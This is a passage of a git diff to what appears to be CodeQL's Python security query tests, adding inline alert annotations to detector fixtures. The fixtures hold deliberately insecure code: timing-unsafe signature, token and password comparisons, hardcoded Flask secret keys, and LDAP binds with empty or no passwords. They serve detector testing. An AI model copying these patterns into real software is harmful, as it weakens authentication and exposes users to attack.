@@ -1,3 +1,4 @@ +#select edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | @@ -9,4 +10,3 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths -#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py index 1d312f028eba..c5084b78e802 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.py @@ -23,18 +23,18 @@ def UnsafeCheckSignature(expected): message = b'To be signed' key = RSA.import_key(open('private_key.der').read()) h = SHA256.new(message) - signature = pkcs1_15.new(key).sign(h) - return expected == signature + signature = pkcs1_15.new(key).sign(h) # $ Source[py/possible-timing-attack-against-hash] + return expected == signature # $ Alert[py/possible-timing-attack-against-hash] def sign(pre_key, msg, alg): - return hmac.new(pre_key, msg, alg).digest() + return hmac.new(pre_key, msg, alg).digest() # $ Source[py/possible-timing-attack-against-hash] def verifyGood(msg, sig): return constant_time_string_compare(sig, sign(key, msg, hashlib.sha256)) #good def verifyBad(msg, sig): key = "e179017a-62b0-4996-8a38-e91aa9f1" - return sig == sign(key, msg, hashlib.sha256) #bad + return sig == sign(key, msg, hashlib.sha256) #bad # $ Alert[py/possible-timing-attack-against-hash] def constant_time_string_compare(a, b): if len(a) != len(b): diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref index 50c9d84b1f96..2829d76e85d2 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py index 211c36274d74..591764ed4f89 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeader.py @@ -11,7 +11,7 @@ @app.route('/bad') def bad(): - if not request.headers.get('X-Auth-Token') == "token": + if not request.headers.get('X-Auth-Token') == "token": # $ Alert raise Exception('bad token') return 'bad' diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected index 14c8b8bf1eb1..25e04cafb6f8 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected @@ -1,6 +1,6 @@ +#select +| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | edges nodes | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref index 9da35da9d6d2..0d31d85dc3f2 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.ql +query: experimental/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected index 80b074348966..b65708ca34e4 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected @@ -1,9 +1,9 @@ +#select +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | edges | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | provenance | | nodes | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths -#select -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref index acfe13f6aad2..bd9d8272f981 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.ql +query: experimental/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py index a34b3b7c5ae5..4619821174ea 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/TimingAttackAgainstSensitiveInfo.py @@ -12,8 +12,8 @@ @app.route('/bad', methods = ['POST', 'GET']) def bad(): if request.method == 'POST': - password = request.form['pwd'] - return password == "1234" + password = request.form['pwd'] # $ Source + return password == "1234" # $ Alert @app.route('/good', methods = ['POST', 'GET']) def good(): diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected index 00c32be4267c..2054ba4a231d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected @@ -1,3 +1,13 @@ +#select +| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | +| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | edges | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | provenance | | | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | provenance | | @@ -32,13 +42,3 @@ nodes | config.py:18:18:18:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | config.py:18:43:18:51 | ControlFlowNode for aConstant | semmle.label | ControlFlowNode for aConstant | subpaths -#select -| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | -| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref index e77b304f62c4..535dfacbac40 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-287-ConstantSecretKey/WebAppConstantSecretKey.ql +query: experimental/Security/CWE-287-ConstantSecretKey/WebAppConstantSecretKey.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py index 442a23e2c3a1..3fcb38acbf93 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_safe.py @@ -2,7 +2,7 @@ from flask_session import Session app = Flask(__name__) -app.config['SECRET_KEY'] = 'CHANGEME' +app.config['SECRET_KEY'] = 'CHANGEME' # $ Alert Session(app) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py index 5aeeb6f7003b..c108dfd45611 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/app_unsafe.py @@ -1,11 +1,11 @@ from flask import Flask, session app = Flask(__name__) -aConstant = 'CHANGEME1' -app.config['SECRET_KEY'] = aConstant -app.secret_key = aConstant -app.config.update(SECRET_KEY=aConstant) -app.config.from_mapping(SECRET_KEY=aConstant) +aConstant = 'CHANGEME1' # $ Source +app.config['SECRET_KEY'] = aConstant # $ Alert +app.secret_key = aConstant # $ Alert +app.config.update(SECRET_KEY=aConstant) # $ Alert +app.config.from_mapping(SECRET_KEY=aConstant) # $ Alert app.config.from_pyfile("config.py") app.config.from_object('config.Config') diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py index 1a512c0d9f08..12dacb516e62 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config.py @@ -4,16 +4,16 @@ import random FLASK_DEBUG = True -aConstant = 'CHANGEME2' +aConstant = 'CHANGEME2' # $ Source class Config: SECRET_KEY = environ.get("envKey") - SECRET_KEY = aConstant + SECRET_KEY = aConstant # $ Alert SECRET_KEY = os.getenv('envKey') SECRET_KEY = os.environ.get('envKey') SECRET_KEY = os.environ.get('envKey', random.randint) SECRET_KEY = os.getenv('envKey', random.randint) - SECRET_KEY = os.getenv('envKey', aConstant) - SECRET_KEY = os.environ.get('envKey', aConstant) + SECRET_KEY = os.getenv('envKey', aConstant) # $ Alert + SECRET_KEY = os.environ.get('envKey', aConstant) # $ Alert SECRET_KEY = os.environ['envKey'] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py index dc3508783e22..96b08fead125 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/config2.py @@ -2,4 +2,4 @@ # General Config FLASK_DEBUG = True -SECRET_KEY = "CHANGEME5" +SECRET_KEY = "CHANGEME5" # $ Alert diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref b/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref index 9f5c6e4c43f4..edd5c17e2b18 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/ImproperLdapAuth.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-287/ImproperLdapAuth.ql +query: experimental/Security/CWE-287/ImproperLdapAuth.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py index d37cc09cfd06..ef274090f91a 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_2.py @@ -16,7 +16,7 @@ def simple_bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.simple_bind('cn=root') + ldap_connection.simple_bind('cn=root') # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -30,7 +30,7 @@ def simple_bind_s_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.simple_bind_s('cn=root') + ldap_connection.simple_bind_s('cn=root') # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -44,7 +44,7 @@ def bind_s_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind_s('cn=root', None) + ldap_connection.bind_s('cn=root', None) # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @app.route("/bind_s_example") @@ -57,7 +57,7 @@ def bind_s_example_kwargs(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind_s(who='cn=root', cred=None) + ldap_connection.bind_s(who='cn=root', cred=None) # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @app.route("/bind_example") @@ -70,7 +70,7 @@ def bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind('cn=root', "") + ldap_connection.bind('cn=root', "") # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) @@ -84,7 +84,7 @@ def bind_example(): search_filter = "(user={})".format(ldap.filter.escape_filter_chars(request.args['search'])) ldap_connection = ldap.initialize("ldap://127.0.0.1:1337") - ldap_connection.bind(who='cn=root', cred="") + ldap_connection.bind(who='cn=root', cred="") # $ Alert user = ldap_connection.search_s(dn, ldap.SCOPE_SUBTREE, search_filter) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py index 2500b4cadb6b..3b99754ec401 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py +++ b/python/ql/test/experimental/query-tests/Security/CWE-287/auth_bad_3.py @@ -16,7 +16,7 @@ def passwordNone(): search_filter = "(user={})".format(escape_filter_chars(request.args['search'])) srv = Server('servername', get_info=ALL) - conn = Connection(srv, 'user_dn', None) + conn = Connection(srv, 'user_dn', None) # $ Alert status, result, response, _ = conn.search(dn, search_filter) @@ -30,7 +30,7 @@ def passwordNoneKwargs(): search_filter = "(user={})".format(escape_filter_chars(request.args['search'])) srv = Server('servername', get_info=ALL) - conn = Connection(srv, user='user_dn', password=None) + conn = Connection(srv, user='user_dn', password=None) # $ Alert status, result, response, _ = conn.search(dn, search_filter) @app.route("/passwordEmpty") @@ -43,7 +43,7 @@ def passwordEmpty(): search_filter = "(user={})".format(escape_filter_chars(request.args['search'])) srv = Server('servername', get_info=ALL) - conn = Connection(srv, user='user_dn', password="") + conn = Connection(srv, user='user_dn', password="") # $ Alert status, result, response, _ = conn.search(dn, search_filter) @@ -57,7 +57,7 @@ def notPassword(): search_filter = "(user={})".format(escape_filter_chars(request.args['search'])) srv = Server('servername', get_info=ALL) - conn = Connection(srv, user='user_dn') + conn = Connection(srv, user='user_dn') # $ Alert status, result, response, _ = conn.search(dn, search_filter) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected index 097e3580fb1d..8ffc7ac31d9b 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected @@ -1,3 +1,9 @@ +#select +| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | edges | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:7:19:7:21 | ControlFlowNode for BSC | provenance | | | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:35:19:35:21 | ControlFlowNode for BSC | provenance | | @@ -86,9 +92,3 @@ nodes | test.py:73:10:73:33 | ControlFlowNode for get_unsafe_blob_client() | semmle.label | ControlFlowNode for get_unsafe_blob_client() | | test.py:75:9:75:10 | ControlFlowNode for bc | semmle.label | ControlFlowNode for bc | subpaths -#select -| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref index b737b32c8159..b5ed8a0d6364 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref +++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql +query: experimental/Security/CWE-327/Azure/UnsafeUsageOfClientSideEncryptionVersion.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/test.py index 32fa60c61930..8cb7d2b7794d 100644 --- 